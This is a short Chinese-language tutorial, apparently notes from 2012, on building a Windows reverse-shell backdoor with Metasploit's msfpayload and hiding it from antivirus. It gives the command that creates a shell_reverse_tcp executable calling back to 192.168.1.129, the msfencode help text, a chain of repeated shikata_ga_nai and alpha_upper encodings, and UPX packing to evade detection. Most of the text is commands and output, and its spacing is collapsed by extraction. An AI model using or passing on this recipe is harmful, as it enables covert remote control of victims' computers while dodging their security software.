参考文案下简单.pdfVIP

MSF下的简单免杀

冰锋刺客—筆記

2012-07-26

生成一个反弹shell后门:windows/shell_reverse_tcp

++

root@bt:~/Desktop#msfpayloadwindows/shell_reverse_tcplhost=192.168.1.129

lport=555xpayload.exe

Createdbymsfpayload().

Payload:windows/shell_reverse_tcp

Length:314

Options:{lhost=192.168.1.129,lport=555}

++

生成的payload很容易就被杀软杀了，可以尝试略微免杀一下。

[+][+]

root@bt:/#msfencode-h

Usage:/opt/framework/msf3/msfencodeoptions

OPTIONS:

-aoptThearchitecturetoencodeas

-boptThelistofcharacterstoavoid:‘\x00\xff’

-coptThenumberoftimestoencodethedata（指定编码次数）

-doptSpecifythedirectoryinwhichtolookforEXEtemplates

-eoptTheencodertouse（指定使用的mafencode）

-hHelpbanner

-ioptEncodethecontentsofthedfilepath

-kKeeptemplateworking;runpayloadinnewthread(usewith-x)

-lListavailableencoders（列出所有的编码格式）

-moptSpecifiesanadditionalmodulesearchpath

-nDumpencoderinformation

-ooptTheoutputfile（生成的地方）

-poptTheplatformtoencodefor

-soptTheumsizeoftheencodeddata

-toptTheoutputformat:raw,ruby,rb,perl,pl,bash,sh,c,js_be,js_le,java,dll,exe,exe-

small,elf,macho,vba,vba-exe,vbs,loop-vbs,asp,aspx,war（指定生成的格式，这里的格式比较多）

-vIncreaseverbosity

-xoptSpecifyanalternateexecutabletemple

[+][+]

root@bt:~/Desktop#msfpayloadwindows/shell_reverse_tcplhost=192.168.1.129lport

=555r|msfencode-ex86/shikata_ga_nai-c5-traw|msfencode-ex86/alpha_upper-

c2-traw|msfencode-ex86/shikata_ga_nai-c5-traw|msfencode-

ex86/alpha_upper-c2-texe-opayload.exe

先用msfencode多次编码绕过

然后用upx给payload加个壳(这个方法还是非常有效的，只是躲不过云查

杀)

++

root@bt:~/Desktop#upx-6payload.exe